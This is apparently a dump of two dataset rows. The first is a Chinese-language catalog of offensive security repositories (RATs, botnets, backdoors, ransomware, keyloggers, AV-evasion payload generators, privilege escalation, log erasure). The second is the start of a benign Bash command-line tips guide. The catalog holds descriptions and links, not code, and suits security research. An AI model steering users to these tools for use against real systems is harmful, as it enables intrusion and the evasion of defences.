[**373**星][3m] [renwax23/xss-payloads](https://github.com/renwax23/xss-payloads) List of XSS Vectors/Payloads\n- [**298**星][4m] [Py] [thekingofduck/easyxsspayload](https://github.com/thekingofduck/easyxsspayload) XssPayload List . Usage:\n- [**262**星][4m] [payloadbox/command-injection-payload-list](https://github.com/payloadbox/command-injection-payload-list) \n\n\n### 远控&&RAT\n\n\n- [**5131**星][4m] [Py] [n1nj4sec/pupy](https://github.com/n1nj4sec/pupy) Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python\n- [**1745**星][7m] [Smali] [ahmyth/ahmyth-android-rat](https://github.com/ahmyth/ahmyth-android-rat) Android Remote Administration Tool\n- [**1335**星][1y] [Py] [marten4n6/evilosx](https://github.com/marten4n6/evilosx) An evil RAT (Remote Administration Tool) for macOS / OS X.\n- [**780**星][2m] [Py] [kevthehermit/ratdecoders](https://github.com/kevthehermit/ratdecoders) Python Decoders for Common Remote Access Trojans\n- [**599**星][1y] [PS] [fortynorthsecurity/wmimplant](https://github.com/FortyNorthSecurity/WMImplant) This is a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine. WMImplant is WMI based.\n- [**500**星][6m] [Visual Basic .NET] [nyan-x-cat/lime-rat](https://github.com/nyan-x-cat/lime-rat) LimeRAT | Simple, yet powerful remote administration tool for Windows (RAT)\n- [**372**星][3m] [C++] [werkamsus/lilith](https://github.com/werkamsus/lilith) Lilith, The Open Source C++ Remote Administration Tool (RAT)\n- [**323**星][3d] [C#] [nyan-x-cat/asyncrat-c-sharp](https://github.com/nyan-x-cat/asyncrat-c-sharp) Open-Source Remote Administration Tool For Windows C# (RAT)\n- [**317**星][6m] [Py] [mvrozanti/rat-via-telegram](https://github.com/mvrozanti/rat-via-telegram) Windows Remote Administration Tool via Telegram\n- [**293**星][4m] [C++] [yuanyuanxiang/simpleremoter](https://github.com/yuanyuanxiang/simpleremoter) 基于gh0st的远程控制器:实现了终端管理、进程管理、窗口管理、远程桌面、文件管理、语音管理、视频管理、服务管理、注册表管理等功能,优化全部代码及整理排版,修复内存泄漏缺陷,程序运行稳定。此项目初版见:\n\n\n### Payload生成\n\n\n- [**3369**星][8d] [C] [screetsec/thefatrat](https://github.com/screetsec/thefatrat) Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…\n - 重复区段: [后渗透->工具->未分类-post-exp](#12abc279c69d1fcf10692b9cb89bcdf7) |\n- [**2678**星][4m] [Java] [frohoff/ysoserial](https://github.com/frohoff/ysoserial) 生成会利用不安全的Java对象反序列化的Payload\n- [**1792**星][t] [Shell] [leebaird/discover](https://github.com/leebaird/discover) 自定义的bash脚本, 用于自动化多个渗透测试任务, 包括: 侦查、扫描、解析、在Metasploit中创建恶意Payload和Listener\n - 重复区段: [渗透->工具->自动化](#fc8737aef0f59c3952d11749fe582dac) |[渗透->工具->Metasploit->未分类-metasploit](#01be61d5bb9f6f7199208ff0fba86b5d) |[侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) |\n- [**1339**星][3m] [PS] [peewpw/invoke-psimage](https://github.com/peewpw/invoke-psimage) Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute\n- [**1075**星][5m] [Py] [nccgroup/winpayloads](https://github.com/nccgroup/winpayloads) Undetectable Windows Payload Generation\n- [**1016**星][1y] [Py] [d4vinci/dr0p1t-framework](https://github.com/d4vinci/dr0p1t-framework) 创建免杀的Dropper\n- [**884**星][19d] [PHP] [ambionics/phpggc](https://github.com/ambionics/phpggc) PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.\n- [**872**星][10m] [Visual Basic .NET] [mdsecactivebreach/sharpshooter](https://github.com/mdsecactivebreach/sharpshooter) Payload Generation Framework\n- [**836**星][28d] [C#] [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net) 生成Payload,恶意利用不安全的 .NET 对象反序列化\n- [**832**星][7m] [Go] [tiagorlampert/chaos](https://github.com/tiagorlampert/chaos) a PoC that allow generate payloads and control remote operating system\n- [**752**星][1y] [Py] [oddcod3/phantom-evasion](https://github.com/oddcod3/phantom-evasion) Python AV evasion tool capable to generate FUD executable even with the most common 32 bit metasploit payload(exe/elf/dmg/apk)\n- [**713**星][6d] [Py] [sevagas/macro_pack](https://github.com/sevagas/macro_pack) 自动生成并混淆MS 文档, 用于渗透测试、演示、社会工程评估等\n- [**634**星][2d] [C] [thewover/donut](https://github.com/thewover/donut) Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters\n- [**633**星][8m] [Shell] [g0tmi1k/msfpc](https://github.com/g0tmi1k/msfpc) MSFvenom Payload Creator (MSFPC)\n- [**419**星][27d] [Perl] [chinarulezzz/pixload](https://github.com/chinarulezzz/pixload) Image Payload Creating/Injecting tools\n- [**301**星][8m] [Py] [0xacb/viewgen](https://github.com/0xacb/viewgen) viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys\n- [**278**星][1y] [Java] [ewilded/shelling](https://github.com/ewilded/shelling) SHELLING - a comprehensive OS command injection payload generator\n- [**268**星][1y] [Shell] [abedalqaderswedan1/aswcrypter](https://github.com/abedalqaderswedan1/aswcrypter) An Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far [FUD]\n\n\n### Botnet&&僵尸网络\n\n\n- [**3747**星][4m] [Py] [malwaredllc/byob](https://github.com/malwaredllc/byob) BYOB (Build Your Own Botnet)\n- [**2163**星][1y] [C++] [maestron/botnets](https://github.com/maestron/botnets) This is a collection of #botnet source codes, unorganized. For EDUCATIONAL PURPOSES ONLY\n- [**412**星][1m] [C++] [souhardya/uboat](https://github.com/souhardya/uboat) HTTP Botnet Project\n- [**328**星][6m] [Go] [saturnsvoid/gobot2](https://github.com/saturnsvoid/gobot2) Second Version of The GoBot Botnet, But more advanced.\n\n\n### 后门&&添加后门\n\n\n- [**386**星][8m] [C] [zerosum0x0/smbdoor](https://github.com/zerosum0x0/smbdoor) Windows kernel backdoor via registering a malicious SMB handler\n- [**378**星][3m] [Shell] [screetsec/vegile](https://github.com/screetsec/vegile) This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell\n- [**370**星][8m] [Py] [s0md3v/cloak](https://github.com/s0md3v/Cloak) Cloak can backdoor any python script with some tricks.\n- [**349**星][15d] [Shell] [r00t-3xp10it/backdoorppt](https://github.com/r00t-3xp10it/backdoorppt) 将Exe格式Payload伪装成Doc(.ppt)\n- [**348**星][9d] [C] [cr4sh/smmbackdoor](https://github.com/cr4sh/smmbackdoor) System Management Mode backdoor for UEFI\n- [**318**星][1y] [Ruby] [carletonstuberg/browser-backdoor](https://github.com/CarletonStuberg/browser-backdoor) BrowserBackdoor is an Electron Application with a JavaScript WebSocket Backdoor and a Ruby Command-Line Listener\n- [**301**星][4m] [C#] [mvelazc0/defcon27_csharp_workshop](https://github.com/mvelazc0/defcon27_csharp_workshop) Writing custom backdoor payloads with C# - Defcon 27\n- [**205**星][9m] [C] [paradoxis/php-backdoor](https://github.com/Paradoxis/PHP-Backdoor) Your interpreter isn’t safe anymore  —  The PHP module backdoor\n\n\n### 混淆器&&Obfuscate\n\n\n- [**3676**星][3d] [TS] [javascript-obfuscator/javascript-obfuscator](https://github.com/javascript-obfuscator/javascript-obfuscator) A powerful obfuscator for JavaScript and Node.js\n- [**2477**星][11m] [C#] [yck1509/confuserex](https://github.com/yck1509/confuserex) An open-source, free protector for .NET applications\n- [**1397**星][9m] [PS] [danielbohannon/invoke-obfuscation](https://github.com/danielbohannon/invoke-obfuscation) PowerShell Obfuscator\n- [**1147**星][8m] [hikariobfuscator/hikari](https://github.com/HikariObfuscator/Hikari) LLVM Obfuscator\n- [**1021**星][1m] [Swift] [rockbruno/swiftshield](https://github.com/rockbruno/swiftshield) wift/OBJ-C Obfuscator\n- [**676**星][1m] [C#] [obfuscar/obfuscar](https://github.com/obfuscar/obfuscar) Open source obfuscation tool for .NET assemblies\n- [**675**星][7m] [C++] [gossip-sjtu/armariris](https://github.com/gossip-sjtu/armariris) 孤挺花(Armariris) -- 由上海交通大学密码与计算机安全实验室维护的LLVM混淆框架\n- [**653**星][6m] [Go] [yawning/obfs4](https://github.com/yawning/obfs4) The obfourscator (Courtesy mirror)\n- [**482**星][3m] [Py] [bashfuscator/bashfuscator](https://github.com/bashfuscator/bashfuscator) A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.\n- [**467**星][2m] [LLVM] [jonathansalwan/tigress_protection](https://github.com/jonathansalwan/tigress_protection) Playing with the Tigress binary protection. Break some of its protections and solve some of its challenges. Automatic deobfuscation using symbolic execution, taint analysis and LLVM.\n- [**458**星][1m] [PHP] [pk-fr/yakpro-po](https://github.com/pk-fr/yakpro-po) YAK Pro - Php Obfuscator\n- [**423**星][11m] [Py] [d4vinci/cuteit](https://github.com/d4vinci/cuteit) IP obfuscator made to make a malicious ip a bit cuter\n- [**420**星][5d] [Py] [dashingsoft/pyarmor](https://github.com/dashingsoft/pyarmor) A tool used to obfuscate python scripts, bind obfuscated scripts to fixed machine or expire obfuscated scripts.\n- [**394**星][1y] [Py] [essandess/isp-data-pollution](https://github.com/essandess/isp-data-pollution) ISP Data Pollution to Protect Private Browsing History with Obfuscation\n- [**348**星][1y] [C] [codermjlee/mjcodeobfuscation](https://github.com/codermjlee/mjcodeobfuscation) 一个用于代码混淆和字符串加密的Mac小Demo\n- [**337**星][22d] [Go] [unixpickle/gobfuscate](https://github.com/unixpickle/gobfuscate) Obfuscate Go binaries and packages\n- [**311**星][3m] [PHP] [elfsundae/laravel-hashid](https://github.com/elfsundae/laravel-hashid) Obfuscate your data by generating reversible, non-sequential, URL-safe identifiers.\n- [**282**星][29d] [Py] [hnfull/intensio-obfuscator](https://github.com/hnfull/intensio-obfuscator) Obfuscate a python code 2.x and 3.x\n- [**276**星][5d] [TS] [javascript-obfuscator/webpack-obfuscator](https://github.com/javascript-obfuscator/webpack-obfuscator) javascript-obfuscator plugin for Webpack\n- [**263**星][6m] [C++] [d35ha/callobfuscator](https://github.com/d35ha/callobfuscator) Obfuscate specific windows apis with different apis\n- [**263**星][4m] [ObjC] [preemptive/ppios-rename](https://github.com/preemptive/ppios-rename) Symbol obfuscator for iOS apps\n- [**235**星][21d] [C#] [xenocoderce/neo-confuserex](https://github.com/xenocoderce/neo-confuserex) Updated ConfuserEX, an open-source, free obfuscator for .NET applications\n- [**202**星][6m] [C#] [bedthegod/confuserex-mod-by-bed](https://github.com/bedthegod/confuserex-mod-by-bed) Beds Protector | Best free obfuscation out right now\n\n\n### Payload管理\n\n\n\n\n### 勒索软件\n\n\n- [**391**星][1y] [Go] [mauri870/ransomware](https://github.com/mauri870/ransomware) A POC Windows crypto-ransomware (Academic)\n- [**331**星][t] [Batchfile] [mitchellkrogza/ultimate.hosts.blacklist](https://github.com/mitchellkrogza/ultimate.hosts.blacklist) The Ultimate Unified Hosts file for protecting your network, computer, smartphones and Wi-Fi devices against millions of bad web sites. Protect your children and family from gaining access to bad web sites and protect your devices and pc from being infected with Malware or Ransomware.\n\n\n### 键盘记录器&&Keylogger\n\n\n- [**710**星][8m] [Py] [giacomolaw/keylogger](https://github.com/giacomolaw/keylogger) A simple keylogger for Windows, Linux and Mac\n- [**462**星][1y] [Py] [mehulj94/radium](https://github.com/mehulj94/Radium) Python keylogger with multiple features.\n- [**364**星][12m] [Py] [ajinabraham/xenotix-python-keylogger](https://github.com/ajinabraham/xenotix-python-keylogger) Xenotix Python Keylogger for Windows.\n\n\n### Meterpreter\n\n\n- [**244**星][1m] [Py] [mez0cc/ms17-010-python](https://github.com/mez0cc/ms17-010-python) MS17-010: Python and Meterpreter\n\n\n### Payload投递\n\n\n- [**263**星][4m] [Py] [no0be/dnslivery](https://github.com/no0be/dnslivery) Easy files and payloads delivery over DNS\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加\n\n\n\n\n\n\n# 后渗透\n\n\n***\n\n\n## 工具\n\n\n### 未分类-post-exp\n\n\n- [**7035**星][t] [C] [hashcat/hashcat](https://github.com/hashcat/hashcat) 世界上最快最先进的密码恢复工具\n - 重复区段: [密码->工具->密码](#86dc226ae8a71db10e4136f4b82ccd06) |\n- [**3369**星][8d] [C] [screetsec/thefatrat](https://github.com/screetsec/thefatrat) Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…\n - 重复区段: [Payload->工具->Payload生成](#ad92f6b801a18934f1971e2512f5ae4f) |\n- [**2479**星][1m] [Shell] [rebootuser/linenum](https://github.com/rebootuser/linenum) Scripted Local Linux Enumeration & Privilege Escalation Checks\n- [**2171**星][1m] [Py] [commixproject/commix](https://github.com/commixproject/commix) Automated All-in-One OS command injection and exploitation tool.\n- [**1243**星][10m] [C] [a0rtega/pafish](https://github.com/a0rtega/pafish) Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.\n- [**1225**星][1y] [C#] [cn33liz/p0wnedshell](https://github.com/cn33liz/p0wnedshell) PowerShell Runspace Post Exploitation Toolkit\n- [**1116**星][9m] [Py] [0x00-0x00/shellpop](https://github.com/0x00-0x00/shellpop) 在渗透中生产简易的/复杂的反向/绑定Shell\n- [**1062**星][2m] [Boo] [byt3bl33d3r/silenttrinity](https://github.com/byt3bl33d3r/silenttrinity) An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR\n- [**1024**星][4m] [Py] [byt3bl33d3r/deathstar](https://github.com/byt3bl33d3r/deathstar) 在Active Directory环境中使用Empire自动获取域管理员权限\n- [**765**星][5m] [Py] [lgandx/pcredz](https://github.com/lgandx/pcredz) This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n- [**743**星][5m] [PS] [hausec/adape-script](https://github.com/hausec/adape-script) Active Directory Assessment and Privilege Escalation Script\n- [**697**星][2m] [C#] [cobbr/sharpsploit](https://github.com/cobbr/sharpsploit) SharpSploit is a .NET post-exploitation library written in C#\n- [**422**星][16d] [Shell] [thesecondsun/bashark](https://github.com/thesecondsun/bashark) Bash post exploitation toolkit\n- [**344**星][5m] [Py] [adrianvollmer/powerhub](https://github.com/adrianvollmer/powerhub) A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting\n- [**282**星][1y] [JS] [chrisallenlane/novahot](https://github.com/chrisallenlane/novahot) Webshell框架,实现了基于Json的API,可与任何语言编写的后门(默认支持PHP/Ruby/Python)进行通信。\n- [**233**星][2d] [Go] [brompwnie/botb](https://github.com/brompwnie/botb) A container analysis and exploitation tool for pentesters and engineers.\n- [**204**星][2m] [Py] [elevenpaths/ibombshell](https://github.com/elevenpaths/ibombshell) Tool to deploy a post-exploitation prompt at any time\n\n\n### 提权&&PrivilegeEscalation\n\n\n- [**3699**星][5m] [C] [secwiki/windows-kernel-exploits](https://github.com/secwiki/windows-kernel-exploits) windows-kernel-exploits Windows平台提权漏洞集合\n- [**1283**星][3m] [Py] [alessandroz/beroot](https://github.com/alessandroz/beroot) Privilege Escalation Project - Windows / Linux / Mac\n- [**638**星][11m] [C++] [ohpe/juicy-potato](https://github.com/ohpe/juicy-potato) A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\\SYSTEM.\n- [**547**星][5m] [rhinosecuritylabs/aws-iam-privilege-escalation](https://github.com/rhinosecuritylabs/aws-iam-privilege-escalation) A centralized source of all AWS IAM privilege escalation methods released by Rhino Security Labs.\n- [**496**星][8m] [Py] [initstring/dirty_sock](https://github.com/initstring/dirty_sock) Linux privilege escalation exploit via snapd (CVE-2019-7304)\n- [**492**星][2m] [C#] [rasta-mouse/watson](https://github.com/rasta-mouse/watson) Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities\n- [**485**星][8m] [C] [nongiach/sudo_inject](https://github.com/nongiach/sudo_inject) [Linux] Two Privilege Escalation techniques abusing sudo token\n- [**392**星][4m] [PS] [cyberark/aclight](https://github.com/cyberark/ACLight) A script for advanced discovery of Privileged Accounts - includes Shadow Admins\n- [**371**星][3m] [PS] [gdedrouas/exchange-ad-privesc](https://github.com/gdedrouas/exchange-ad-privesc) Exchange privilege escalations to Active Directory\n- [**340**星][2m] [Shell] [nullarray/roothelper](https://github.com/nullarray/roothelper) 辅助在被攻克系统上的提权过程:自动枚举、下载、解压并执行提权脚本\n- [**308**星][5m] [Batchfile] [frizb/windows-privilege-escalation](https://github.com/frizb/windows-privilege-escalation) Windows Privilege Escalation Techniques and Scripts\n- [**269**星][4m] [PHP] [lawrenceamer/0xsp-mongoose](https://github.com/lawrenceamer/0xsp-mongoose) Privilege Escalation Enumeration Toolkit (64/32 ) , fast , intelligent enumeration with Web API integration . Mastering Your Own Finding\n- [**223**星][3m] [Py] [initstring/uptux](https://github.com/initstring/uptux) Linux privilege escalation checks (systemd, dbus, socket fun, etc)\n- [**222**星][4d] [C#] [carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)\n- [**222**星][4d] [C#] [carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)\n\n\n### Windows\n\n\n#### 未分类-Windows\n\n\n- [**8785**星][28d] [C] [gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz) A little tool to play with Windows security\n- [**2153**星][2m] [Py] [trustedsec/unicorn](https://github.com/trustedsec/unicorn) 通过PowerShell降级攻击, 直接将Shellcode注入到内存\n- [**2045**星][13d] [C++] [darthton/blackbone](https://github.com/darthton/blackbone) Windows memory hacking library\n- [**999**星][11m] [Batchfile] [sagishahar-zz/lpeworkshop](https://github.com/sagishahar-zz/lpeworkshop) Windows / Linux Local Privilege Escalation Workshop\n- [**931**星][6d] [C#] [googleprojectzero/sandbox-attacksurface-analysis-tools](https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools) 沙箱攻击面(Attack Surface)分析工具,用于测试 Windows 上沙箱的各种属性\n- [**700**星][8m] [C] [hfiref0x/tdl](https://github.com/hfiref0x/tdl) Driver loader for bypassing Windows x64 Driver Signature Enforcement\n- [**694**星][5m] [C#] [outflanknl/evilclippy](https://github.com/outflanknl/evilclippy) A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows.\n- [**611**星][9m] [C#] [0xbadjuju/tokenvator](https://github.com/0xbadjuju/tokenvator) A tool to elevate privilege with Windows Tokens\n- [**519**星][12m] [PS] [a-min3/winspect](https://github.com/a-min3/winspect) Powershell-based Windows Security Auditing Toolbox\n- [**416**星][1m] [C++] [hoshimin/kernel-bridge](https://github.com/hoshimin/kernel-bridge) Windows kernel hacking framework, driver template, hypervisor and API written on C++\n- [**391**星][2m] [Java] [tiagorlampert/saint](https://github.com/tiagorlampert/saint) a Spyware Generator for Windows systems written in Java\n- [**349**星][2m] [Shell] [orlikoski/skadi](https://github.com/orlikoski/Skadi) collection, processing and advanced analysis of forensic artifacts and images.\n- [**341**星][1y] [C++] [qax-a-team/eventcleaner](https://github.com/QAX-A-Team/EventCleaner) A tool mainly to erase specified records from Windows event logs, with additional functionalities.\n- [**340**星][19d] [C] [mattiwatti/efiguard](https://github.com/mattiwatti/efiguard) Disable PatchGuard and DSE at boot time\n- [**302**星][2d] [Py] [skylined/bugid](https://github.com/skylined/bugid) Detect, analyze and uniquely identify crashes in Windows applications\n- [**298**星][1y] [PS] [onelogicalmyth/zeroday-powershell](https://github.com/onelogicalmyth/zeroday-powershell) A PowerShell example of the Windows zero day priv esc\n- [**290**星][7m] [Py] [ropnop/windapsearch](https://github.com/ropnop/windapsearch) Python script to enumerate users, groups and computers from a Windows domain through LDAP queries\n- [**288**星][11m] [maaaaz/impacket-examples-windows](https://github.com/maaaaz/impacket-examples-windows) The great impacket example scripts compiled for Windows\n- [**213**星][4m] [PHP] [rizer0/log-killer](https://github.com/rizer0/log-killer) Clear all your logs in [linux/windows] servers\n- [**212**星][1m] [C++] [can1357/byepg](https://github.com/can1357/byepg) Defeating Patchguard universally for Windows 8, Windows 8.1 and all versions of Windows 10 regardless of HVCI\n- [**211**星][1y] [C++] [tandasat/pgresarch](https://github.com/tandasat/pgresarch) PatchGuard Research\n- [**206**星][20d] [Py] [mzfr/rsh](https://github.com/mzfr/rsh) generate reverse shell from CLI for linux and Windows.\n- [**203**星][5d] [Py] [ropnop/impacket_static_binaries](https://github.com/ropnop/impacket_static_binaries) Standalone binaries for Linux/Windows of Impacket's examples\n- [**201**星][10m] [HTML] [mxmssh/drltrace](https://github.com/mxmssh/drltrace) Drltrace is a library calls tracer for Windows and Linux applications.\n\n\n#### UAC\n\n\n- [**2355**星][3d] [C] [hfiref0x/uacme](https://github.com/hfiref0x/uacme) Defeating Windows User Account Control\n\n\n#### AppLocker\n\n\n\n\n#### ActiveDirectory\n\n\n- [**3652**星][19d] [PS] [bloodhoundad/bloodhound](https://github.com/BloodHoundAD/BloodHound) a single page Javascript web application, uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.\n- [**2009**星][3m] [infosecn1nja/ad-attack-defense](https://github.com/infosecn1nja/ad-attack-defense) Attack and defend active directory using modern post exploitation adversary tradecraft activity\n- [**338**星][9m] [Py] [dirkjanm/ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) Active Directory information dumper via LDAP\n- [**242**星][1y] [Go] [netspi/goddi](https://github.com/netspi/goddi) goddi (go dump domain info) dumps Active Directory domain information\n\n\n#### 域渗透\n\n\n\n\n#### WET\n\n\n\n\n\n\n### 驻留&&Persistence\n\n\n- [**306**星][3m] [C#] [fireeye/sharpersist](https://github.com/fireeye/sharpersist) Windows persistence toolkit \n\n\n### Linux&&Xnix\n\n\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加\n\n\n\n\n\n\n# 贡献\n内容为系统自动导出, 有任何问题请提issue"}}},{"rowIdx":680,"cells":{"text":{"kind":"string","value":"🌍\n*[Čeština](README-cs.md) ∙ [Deutsch](README-de.md) ∙ [Ελληνικά](README-el.md) ∙ [English](README.md) ∙ [Español](README-es.md) ∙ [Français](README-fr.md) ∙ [Indonesia](README-id.md) ∙ [Italiano](README-it.md) ∙ [日本語](README-ja.md) ∙ [한국어](README-ko.md) ∙ [polski](README-pl.md) ∙ [Português](README-pt.md) ∙ [Română](README-ro.md) ∙ [Русский](README-ru.md) ∙ [Slovenščina](README-sl.md) ∙ [Українська](README-uk.md) ∙ [简体中文](README-zh.md) ∙ [繁體中文](README-zh-Hant.md)*\n\n\n# The Art of Command Line\n\n*Note: I'm planning to revise this and looking for a new co-author to help with expanding this into a more comprehensive guide. While it's very popular, it could be broader and a bit deeper. If you like to write and are close to being an expert on this material and willing to consider helping, please drop me a note at josh (0x40) holloway.com. –[jlevy](https://github.com/jlevy), [Holloway](https://www.holloway.com). Thank you!*\n\n- [Meta](#meta)\n- [Basics](#basics)\n- [Everyday use](#everyday-use)\n- [Processing files and data](#processing-files-and-data)\n- [System debugging](#system-debugging)\n- [One-liners](#one-liners)\n- [Obscure but useful](#obscure-but-useful)\n- [macOS only](#macos-only)\n- [Windows only](#windows-only)\n- [More resources](#more-resources)\n- [Disclaimer](#disclaimer)\n\n\n![curl -s 'https://raw.githubusercontent.com/jlevy/the-art-of-command-line/master/README.md' | egrep -o '`\\w+`' | tr -d '`' | cowsay -W50](cowsay.png)\n\nFluency on the command line is a skill often neglected or considered arcane, but it improves your flexibility and productivity as an engineer in both obvious and subtle ways. This is a selection of notes and tips on using the command-line that we've found useful when working on Linux. Some tips are elementary, and some are fairly specific, sophisticated, or obscure. This page is not long, but if you can use and recall all the items here, you know a lot.\n\nThis work is the result of [many authors and translators](AUTHORS.md).\nSome of this\n[originally](http://www.quora.com/What-are-some-lesser-known-but-useful-Unix-commands)\n[appeared](http://www.quora.com/What-are-the-most-useful-Swiss-army-knife-one-liners-on-Unix)\non [Quora](http://www.quora.com/What-are-some-time-saving-tips-that-every-Linux-user-should-know),\nbut it has since moved to GitHub, where people more talented than the original author have made numerous improvements.\n[**Please submit a question**](https://airtable.com/shrzMhx00YiIVAWJg) if you have a question related to the command line. [**Please contribute**](/CONTRIBUTING.md) if you see an error or something that could be better!\n\n## Meta\n\nScope:\n\n- This guide is for both beginners and experienced users. The goals are *breadth* (everything important), *specificity* (give concrete examples of the most common case), and *brevity* (avoid things that aren't essential or digressions you can easily look up elsewhere). Every tip is essential in some situation or significantly saves time over alternatives.\n- This is written for Linux, with the exception of the \"[macOS only](#macos-only)\" and \"[Windows only](#windows-only)\" sections. Many of the other items apply or can be installed on other Unices or macOS (or even Cygwin).\n- The focus is on interactive Bash, though many tips apply to other shells and to general Bash scripting.\n- It includes both \"standard\" Unix commands as well as ones that require special package installs -- so long as they are important enough to merit inclusion.\n\nNotes:\n\n- To keep this to one page, content is implicitly included by reference. You're smart enough to look up more detail elsewhere once you know the idea or command to Google. Use `apt`, `yum`, `dnf`, `pacman`, `pip` or `brew` (as appropriate) to install new programs.\n- Use [Explainshell](http://explainshell.com/) to get a helpful breakdown of what commands, options, pipes etc. do.\n\n\n## Basics\n\n- Learn basic Bash. Actually, type `man bash` and at least skim the whole thing; it's pretty easy to follow and not that long. Alternate shells can be nice, but Bash is powerful and always available (learning *only* zsh, fish, etc., while tempting on your own laptop, restricts you in many situations, such as using existing servers).\n\n- Learn at least one text-based editor well. The `nano` editor is one of the simplest for basic editing (opening, editing, saving, searching). However, for the power user in a text terminal, there is no substitute for Vim (`vi`), the hard-to-learn but venerable, fast, and full-featured editor. Many people also use the classic Emacs, particularly for larger editing tasks. (Of course, any modern software developer working on an extensive project is unlikely to use only a pure text-based editor and should also be familiar with modern graphical IDEs and tools.)\n\n- Finding documentation:\n - Know how to read official documentation with `man` (for the inquisitive, `man man` lists the section numbers, e.g. 1 is \"regular\" commands, 5 is files/conventions, and 8 are for administration). Find man pages with `apropos`.\n - Know that some commands are not executables, but Bash builtins, and that you can get help on them with `help` and `help -d`. You can find out whether a command is an executable, shell builtin or an alias by using `type command`.\n - `curl cheat.sh/command` will give a brief \"cheat sheet\" with common examples of how to use a shell command.\n\n- Learn about redirection of output and input using `>` and `<` and pipes using `|`. Know `>` overwrites the output file and `>>` appends. Learn about stdout and stderr.\n\n- Learn about file glob expansion with `*` (and perhaps `?` and `[`...`]`) and quoting and the difference between double `\"` and single `'` quotes. (See more on variable expansion below.)\n\n- Be familiar with Bash job management: `&`, **ctrl-z**, **ctrl-c**, `jobs`, `fg`, `bg`, `kill`, etc.\n\n- Know `ssh`, and the basics of passwordless authentication, via `ssh-agent`, `ssh-add`, etc.\n\n- Basic file management: `ls` and `ls -l` (in particular, learn what every column in `ls -l` means), `less`, `head`, `tail` and `tail -f` (or even better, `less +F`), `ln` and `ln -s` (learn the differences and advantages of hard versus soft links), `chown`, `chmod`, `du` (for a quick summary of disk usage: `du -hs *`). For filesystem management, `df`, `mount`, `fdisk`, `mkfs`, `lsblk`. Learn what an inode is (`ls -i` or `df -i`).\n\n- Basic network management: `ip` or `ifconfig`, `dig`, `traceroute`, `route`.\n\n- Learn and use a version control management system, such as `git`.\n\n- Know regular expressions well, and the various flags to `grep`/`egrep`. The `-i`, `-o`, `-v`, `-A`, `-B`, and `-C` options are worth knowing.\n\n- Learn to use `apt-get`, `yum`, `dnf` or `pacman` (depending on distro) to find and install packages. And make sure you have `pip` to install Python-based command-line tools (a few below are easiest to install via `pip`).\n\n\n## Everyday use\n\n- In Bash, use **Tab** to complete arguments or list all available commands and **ctrl-r** to search through command history (after pressing, type to search, press **ctrl-r** repeatedly to cycle through more matches, press **Enter** to execute the found command, or hit the right arrow to put the result in the current line to allow editing).\n\n- In Bash, use **ctrl-w** to delete the last word, and **ctrl-u** to delete the content from current cursor back to the start of the line. Use **alt-b** and **alt-f** to move by word, **ctrl-a** to move cursor to beginning of line, **ctrl-e** to move cursor to end of line, **ctrl-k** to kill to the end of the line, **ctrl-l** to clear the screen. See `man readline` for all the default keybindings in Bash. There are a lot. For example **alt-.** cycles through previous arguments, and **alt-*** expands a glob.\n\n\n- Alternatively, if you love vi-style key-bindings, use `set -o vi` (and `set -o emacs` to put it back).\n\n- For editing long commands, after setting your editor (for example `export EDITOR=vim`), **ctrl-x** **ctrl-e** will open the current command in an editor for multi-line editing. Or in vi style, **escape-v**.\n\n- To see recent commands, use `history`. Follow with `!n` (where `n` is the command number) to execute again. There are also many abbreviations you can use, the most useful probably being `!$` for last argument and `!!` for last command (see \"HISTORY EXPANSION\" in the man page). However, these are often easily replaced with **ctrl-r** and **alt-.**.\n\n- Go to your home directory with `cd`. Access files relative to your home directory with the `~` prefix (e.g. `~/.bashrc`). In `sh` scripts refer to the home directory as `$HOME`.\n\n- To go back to the previous working directory: `cd -`.\n\n- If you are halfway through typing a command but change your mind, hit **alt-#** to add a `#` at the beginning and enter it as a comment (or use **ctrl-a**, **#**, **enter**). 